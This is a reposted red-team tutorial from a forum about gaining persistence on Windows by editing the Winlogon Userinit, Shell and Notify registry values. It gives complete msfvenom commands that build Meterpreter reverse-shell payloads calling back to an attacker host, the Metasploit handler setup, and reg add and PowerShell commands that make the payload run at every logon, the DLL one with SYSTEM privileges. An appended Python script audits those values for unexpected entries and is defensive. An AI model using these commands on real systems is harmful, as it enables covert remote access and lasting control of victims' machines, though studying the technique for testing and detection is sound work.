[Repost] Persistence – Winlogon Helper DLL
Posted: 2020-2-13 10:14


Original link: https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/

Winlogon is a Windows component that handles activities such as logon, logoff, loading the user profile during authentication, shutdown and the lock screen. This behavior is controlled by registry values that define which processes Winlogon starts during Windows logon. From a red team perspective these events can serve as the trigger that executes an arbitrary payload for persistence.

Implementing this persistence technique requires modifying one of the following registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify

The Metasploit utility “msfvenom” can be used to generate arbitrary payloads in various formats.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > pentestlab.exe

[Image: Metasploit – msfvenom]

The Metasploit “handler” module must be configured to match the payload so that it captures the connection when the payload is executed on the target system.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
exploit

[Image: Metasploit – Handler Module]

The generated executable needs to be dropped onto the system (into System32). Modifying the “Userinit” registry value to include the arbitrary payload will cause the system to run both executables (userinit.exe and pentestlab.exe) during Windows logon.

[Image: Registry Key – Userinit]

A Meterpreter session will open once the payload is executed.

[Image: Metasploit – Meterpreter]

The “Shell” registry value behaves in the same way.

[Image: Registry Key – Shell]

The malicious payload will be executed during Windows authentication and a connection will be established.

[Image: Persistence – Shell Registry Key Modification]

The “Notify” registry key is typically found in older operating systems (prior to Windows 7) and points to a notification package DLL that handles Winlogon events. Replacing a DLL entry under this key with an arbitrary DLL will cause Windows to execute it during logon. The following command can be used to generate a payload in the form of a DLL file with Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f dll > pentestlab.dll

[Image: Metasploit – msfvenom DLL Generation]

Here the “DLLName” registry entry has been modified to point to the arbitrary DLL.

[Image: Registry Key – Notify]

The DLL will be executed with SYSTEM level privileges and a Meterpreter connection will open on the next Windows logon.

[Image: Persistence Notify Registry Key – Meterpreter]

Instead of using the registry editor, the following two commands can be run from an elevated command prompt to modify the “Shell” and “Userinit” registry entries.

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, pentestlab.exe" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, pentestlab.exe" /f

[Image: Winlogon Registry Keys – Command Prompt]

Similarly, PowerShell can be used to modify the existing registry entries with the “Set-ItemProperty” cmdlet.

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, pentestlab.exe" -Force
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, pentestlab.exe" -Force
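As an added defensive check (not part of the original post or pentestlab's tooling), the script below audits the “Shell” and “Userinit” values described above: it splits them the way Winlogon does (comma-separated) and reports any entry outside a default baseline. The baseline set, the `SAMPLE_TAMPERED` values and the function names are assumptions constructed here; on Windows it reads the live HKLM values via `winreg`, elsewhere it runs against the constructed sample.

```python
"""Audit Winlogon Shell/Userinit for entries outside the default baseline.
Added example for this post, not pentestlab's code; baseline is an assumption."""
import sys

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Assumed baseline for a default install. Userinit normally carries a
# trailing comma, which split_entries() drops as an empty entry.
EXPECTED = {
    "Shell": {"explorer.exe"},
    "Userinit": {"userinit.exe", r"c:\windows\system32\userinit.exe"},
}


def split_entries(value: str) -> list:
    """Split a comma-separated Winlogon value into trimmed, lower-cased entries."""
    return [e.strip().strip('"').lower() for e in value.split(",") if e.strip()]


def audit_winlogon(values: dict) -> list:
    """Return one finding per entry that is not in the baseline for its value name."""
    findings = []
    for name, raw in values.items():
        if name not in EXPECTED:
            continue
        for entry in split_entries(raw):
            if entry not in EXPECTED[name]:
                findings.append(f"{name}: unexpected entry '{entry}'")
    return findings


def read_live_values() -> dict:
    """Read the live HKLM Winlogon values (Windows only; winreg import is lazy)."""
    import winreg
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        for name in EXPECTED:
            try:
                out[name], _ = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                pass  # value absent: nothing to audit for this name
    return out


# Constructed sample mirroring the modified values shown in the post.
SAMPLE_TAMPERED = {
    "Userinit": "Userinit.exe, pentestlab.exe",
    "Shell": "explorer.exe, pentestlab.exe",
}

if __name__ == "__main__":
    values = read_live_values() if sys.platform == "win32" else SAMPLE_TAMPERED
    for line in audit_winlogon(values) or ["no unexpected Winlogon entries"]:
        print(line)
```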

[Image: Winlogon Registry Keys – PowerShell]


Latest replies (1)

Thanks for sharing
2020-2-13 17:02